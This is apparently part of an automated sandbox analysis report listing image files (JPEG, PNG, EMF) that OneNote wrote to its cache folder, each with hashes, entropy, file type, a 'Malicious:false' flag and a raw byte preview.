                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A5.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):39010
                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A7.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):25622
                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000A9.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2033
                                                                                                  Entropy (8bit):6.8741208714657
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                  MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                  SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                  SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                  SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AB.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55804
                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AD.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59832
                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AF.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):33032
                                                                                                  Entropy (8bit):2.941351060644542
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                  MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                  SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                  SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                  SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                  Malicious:false
                                                                                                  Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AG.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):12180
                                                                                                  Entropy (8bit):5.318266117301791
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                  MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                  SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                  SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                  SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AI.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 39 x 600, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2104
                                                                                                  Entropy (8bit):7.252780160030615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
                                                                                                  MD5:F6C596F505504044DF1E36BA5DA3F09B
                                                                                                  SHA1:BCF17EC408899B822492B47E307DE638CC792447
                                                                                                  SHA-256:EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
                                                                                                  SHA-512:E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AK.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14177
                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AM.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):36740
                                                                                                  Entropy (8bit):7.48266872907324
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                  MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                  SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                  SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                  SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AO.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):53259
                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AQ.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60924
                                                                                                  Entropy (8bit):7.758472758205366
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                  MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                  SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                  SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                  SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AS.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 39 x 579, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):515
                                                                                                  Entropy (8bit):6.740133870626016
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
                                                                                                  MD5:E96BE30D892A5412CF262FEE652921CA
                                                                                                  SHA1:8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
                                                                                                  SHA-256:0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
                                                                                                  SHA-512:D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000AU.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 30 x 700, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1547
                                                                                                  Entropy (8bit):6.4194805172468286
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
                                                                                                  MD5:0BA36A74DFBF411FAB348404CCEC3348
                                                                                                  SHA1:4C619790E517416E178161028987DF1CD3B871CC
                                                                                                  SHA-256:2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
                                                                                                  SHA-512:90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B0.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):95763
                                                                                                  Entropy (8bit):7.931689087616878
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                  MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                  SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                  SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                  SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                  Malicious:false
